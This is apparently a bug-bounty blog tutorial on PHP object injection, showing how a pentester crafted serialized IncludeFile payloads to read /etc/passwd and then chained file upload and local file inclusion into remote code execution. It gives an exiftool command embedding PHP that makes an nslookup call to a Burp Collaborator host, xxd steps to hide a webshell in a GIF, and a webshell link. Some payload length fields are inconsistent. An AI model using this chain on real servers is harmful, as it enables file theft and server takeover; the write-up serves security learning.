PHPObjectInjection

Hello bug-hunters, today we are gonna talk about PHPObjectInjection and leveraging the power of Reflection to modify the serialized objects and access any arbitrary files from the server, later we will learn how to convert it into an RCE (Remote Code Execution). let the hunt begin;

What is PHPObjectInjection?

Before we talk about the attack, let’s understand what is Serialization? I hope you must be having an idea about it, lets have a revision,

Serialization is basically converting a set of data structures or objects into a stream of bytes to transmit it to a memory, a database, or a file. The main advantage of this technology is to save the state of an object to be able to recreate it whenever needed, eg. video games, etc.

Areas of Risks

Along with the advantage this technology also has its disadvantages. This vulnerability could occur when user-supplied input is not appropriately sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, a malicious actor could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.

To successfully exploit a PHP Object Injection vulnerability the following two conditions must be met:

1. The application must have a class that implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”.

2. All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes.

Attack Story

During a recent Pen-Test, I came across an interesting piece of PHP code that could lead to RCE, but the exploitation was a bit tricky. After spending some sleepless nights trying to break this code, I identified that both application and system-level code execution was possible using the vulnerability.

The vulnerable Code:

The vulnerable code

In the above code, a user-controlled value can be passed on to a PHP un-serialization function. The application accepts a “filename” which gets called, and the output is then fed to a PHP unserialize module. With the above bug both application level and system-level code, executions are possible. For exploiting this vulnerability both the conditions are satisfied.

Serialization example:

Serializing a 3 char string array

sample code for serializationthe output of the above-serialized string array

Understanding the serialized string

understanding meaning of each string

In my pentest, I found an instance where the “file” parameter was carrying a base64 encoded payload, later identified to be a serialized object as shown in Figure below;

file parameter with the serialized value

Serialized value after decoding

“O:8:”HTMLFile”:1:{s:8:”filename”;s:9:”help.html”;}”

On the response side if you’d see, we have another code that has a class named “IncludeFile” a vulnerable function “filename” and a magic function “function __toString()”, here we have an advantage to craft our own payload so let’s make our own payload.

O:11:”IncludeFile”:1:{s:8:”filename”;s11:”/etc/passwd”;}

This is our payload; pretty easy to understand, I have just replaced the class name, make sure the string chars and lengths are exactly matching as shown in the above payload.

This is cool, let’s base64 encode it, and boom!! it worked

power of reflection

Using the power of reflection we were able to modify the serialized objects and access any arbitrary files from the server!! Isn't this amazing??

Let’s move on to RCE!

So I had a file upload functionality, and this functionality only allows the image files to be uploaded, how this can be turned into a Remote Code Execution??

1. Create an Image file with PHP code using EXIF or any other image utility tool

2. Upload the file and locate the path

3. Utilize LFI include image file and make an Out of Band call to confirm the code execution

4. Make use of a PHP webshell, convert it into a image file, upload it and run arbitrary commands

We will be using the EXIF tool with the following command:

“exiftool -Comment=’<?php system(“nslookup 4lqd7k2ulofzkiwzv0m5gf7qohu8ix.burpcollaborator.net”); ?>’ beingsecure.jpeg”

creating image with PHP code

Let’s upload the file.

upload the PHP injected code

Now, let’s utilize the LFI include image file to make an out-of-band call, so our payload will look like this; further, we have to base64 encode it.

O:11:”IncludeFile”:1:{s:8:”filename”;s:38:”/var/www/html/uploads/beingsecure.jpeg”;}

As shown in the Figure below, we have successfully made an out-of-band call that confirms the execution.

Now, let’s try to upload a web shell, you can get a PHP web shell on the following link;

https://github.com/drag0s/php-webshell/blob/master/webshell.php

First, we have to convert the .PHP file into .hex using the following command

xxd -plain w3bsh3ll.php > tenor.hex

converting PHP to hex

Dump this .hex file into an image/gif file using the following command

xxd -plain -revert tenor.hex antara.gif

Dumping the .hex into our image file

Now, we can upload this file onto the server

uploading the image file

Once again, let’s utilize the LFI to include image file to run arbitrary commands on the server, our payload will look like;

O:11:”IncludeFile”:1:{s:8:”filename”;s:38:”/var/www/html/uploads/antara.gif”;}

making our payload

And yes!! we have successfully uploaded the PHP webshell

So now you can run arbitrary commands on the server!!

LFI to RCE!

Thank you All for making out the time and reading this article.

Stay Tuned for another interesting attack!!

You can connect with me @https://github.com/InfoSecAntara